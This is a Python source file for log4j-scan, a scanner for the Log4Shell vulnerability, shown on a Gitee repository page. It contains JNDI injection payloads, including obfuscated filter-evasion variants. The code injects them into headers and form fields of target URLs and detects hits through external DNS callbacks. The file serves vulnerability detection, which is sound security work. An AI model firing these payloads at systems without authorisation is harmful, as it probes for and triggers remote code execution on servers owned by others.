1 Star 1 Fork 0

creatywy/log4j-scan

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
克隆/下载
log4j-scan.py 16.91 KB
一键复制 编辑 原始数据 按行查看 历史
Mazin Ahmed 提交于 2021-12-25 21:25 . minor typos
#!/usr/bin/env python3
# coding=utf-8
# ******************************************************************
# log4j-scan: A generic scanner for Apache log4j RCE CVE-2021-44228
# Author:
# Mazin Ahmed <Mazin at FullHunt.io>
# Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
# Secure your Attack Surface with FullHunt.io.
# ******************************************************************
import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
if len(sys.argv) <= 1:
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
default_headers = {
'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
'Accept': '*/*' # not being tested to allow passing through checks on Accept header in older web-servers
}
post_data_parameters = ["username", "user", "uname", "name", "email", "email_address", "password"]
timeout = 4
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}/",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}/{{random}}}",
"${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
"${j${k8s:k5:-ND}i:ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{callback_host}}/{{random}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}",
"${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}",
"${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{callback_host}}/{{random}}}"
]
cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-p", "--proxy",
dest="proxy",
help="send requests through proxy",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("--request-type",
dest="request_type",
help="Request Type: (get, post) - [Default: get].",
default="get",
action='store')
parser.add_argument("--headers-file",
dest="headers_file",
help="Headers fuzzing list - [default: headers.txt].",
default="headers.txt",
action='store')
parser.add_argument("--run-all-tests",
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
action='store_true')
parser.add_argument("--wait-time",
dest="wait_time",
help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
default=5,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
action='store_true')
parser.add_argument("--custom-waf-bypass-payload",
dest="custom_waf_bypass_payload",
help="Test with custom WAF bypass payload.")
parser.add_argument("--test-CVE-2021-45046",
dest="cve_2021_45046",
help="Test using payloads for CVE-2021-45046 (detection payloads).",
action='store_true')
parser.add_argument("--dns-callback-provider",
dest="dns_callback_provider",
help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
default="interact.sh",
action='store')
parser.add_argument("--custom-dns-callback-host",
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have a higher chance of reaching vulnerable systems.",
action='store_true')
args = parser.parse_args()
proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
if args.custom_waf_bypass_payload:
waf_bypass_payloads.append(args.custom_waf_bypass_payload)
def get_fuzzing_headers(payload):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(args.headers_file, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
if args.exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
if "Referer" in fuzzing_headers:
fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
return fuzzing_headers
def get_fuzzing_post_data(payload):
fuzzing_post_data = {}
for i in post_data_parameters:
fuzzing_post_data.update({i: payload})
return fuzzing_post_data
def generate_waf_bypass_payloads(callback_host, random_string):
payloads = []
for i in waf_bypass_payloads:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
def get_cve_2021_45046_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45046:
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
payloads.append(new_payload)
return payloads
class Dnslog(object):
def __init__(self):
self.s = requests.session()
req = self.s.get("http://www.dnslog.cn/getdomain.php",
proxies=proxies,
timeout=30)
self.domain = req.text
def pull_logs(self):
req = self.s.get("http://www.dnslog.cn/getrecords.php",
proxies=proxies,
timeout=30)
return req.json()
class Interactsh:
# Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
def __init__(self, token="", server=""):
rsa = RSA.generate(2048)
self.public_key = rsa.publickey().exportKey()
self.private_key = rsa.exportKey()
self.token = token
self.server = server.lstrip('.') or 'interact.sh'
self.headers = {
"Content-Type": "application/json",
}
if self.token:
self.headers['Authorization'] = self.token
self.secret = str(uuid4())
self.encoded = b64encode(self.public_key).decode("utf8")
guid = uuid4().hex.ljust(33, 'a')
guid = ''.join(i if i.isdigit() else chr(ord(i) + random.randint(0, 20)) for i in guid)
self.domain = f'{guid}.{self.server}'
self.correlation_id = self.domain[:20]
self.session = requests.session()
self.session.headers = self.headers
self.session.verify = False
self.session.proxies = proxies
self.register()
def register(self):
data = {
"public-key": self.encoded,
"secret-key": self.secret,
"correlation-id": self.correlation_id
}
res = self.session.post(
f"https://{self.server}/register", headers=self.headers, json=data, timeout=30)
if 'success' not in res.text:
raise Exception("Can not initiate interact.sh DNS callback client")
def pull_logs(self):
result = []
url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
res = self.session.get(url, headers=self.headers, timeout=30).json()
aes_key, data_list = res['aes_key'], res['data']
for i in data_list:
decrypt_data = self.__decrypt_data(aes_key, i)
result.append(self.__parse_log(decrypt_data))
return result
def __decrypt_data(self, aes_key, data):
private_key = RSA.importKey(self.private_key)
cipher = PKCS1_OAEP.new(private_key, hashAlgo=SHA256)
aes_plain_key = cipher.decrypt(base64.b64decode(aes_key))
decode = base64.b64decode(data)
bs = AES.block_size
iv = decode[:bs]
cryptor = AES.new(key=aes_plain_key, mode=AES.MODE_CFB, IV=iv, segment_size=128)
plain_text = cryptor.decrypt(decode)
return json.loads(plain_text[16:])
def __parse_log(self, log_entry):
new_log_entry = {"timestamp": log_entry["timestamp"],
"host": f'{log_entry["full-id"]}.{self.domain}',
"remote_address": log_entry["remote-address"]
}
return new_log_entry
def parse_url(url):
"""
Parses the URL.
"""
# Url: https://example.com/login.jsp
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# FilePath: /login.jsp
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
return({"scheme": scheme,
"site": f"{scheme}://{urlparse.urlparse(url).netloc}",
"host": urlparse.urlparse(url).netloc.split(":")[0],
"file_path": file_path})
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]
if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
if args.request_type.upper() == "POST" or args.run_all_tests:
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
def main():
urls = []
if args.url:
urls.append(args.url)
if args.usedlist:
with open(args.usedlist, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
urls.append(i)
dns_callback_host = ""
if args.custom_dns_callback_host:
cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
dns_callback_host = args.custom_dns_callback_host
else:
cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
if args.dns_callback_provider == "interact.sh":
dns_callback = Interactsh()
elif args.dns_callback_provider == "dnslog.cn":
dns_callback = Dnslog()
else:
raise ValueError("Invalid DNS Callback provider")
dns_callback_host = dns_callback.domain
cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
for url in urls:
cprint(f"[•] URL: {url}", "magenta")
scan_url(url, dns_callback_host)
if args.custom_dns_callback_host:
cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
return
cprint("[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.", "cyan")
cprint("[•] Waiting...", "cyan")
time.sleep(int(args.wait_time))
records = dns_callback.pull_logs()
if len(records) == 0:
cprint("[•] Targets do not seem to be vulnerable.", "green")
else:
cprint("[!!!] Targets Affected", "yellow")
for i in records:
cprint(json.dumps(i), "yellow")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
Python
1
https://gitee.com/creatywy/log4j-scan.git
git@gitee.com:creatywy/log4j-scan.git
creatywy
log4j-scan
log4j-scan
master

搜索帮助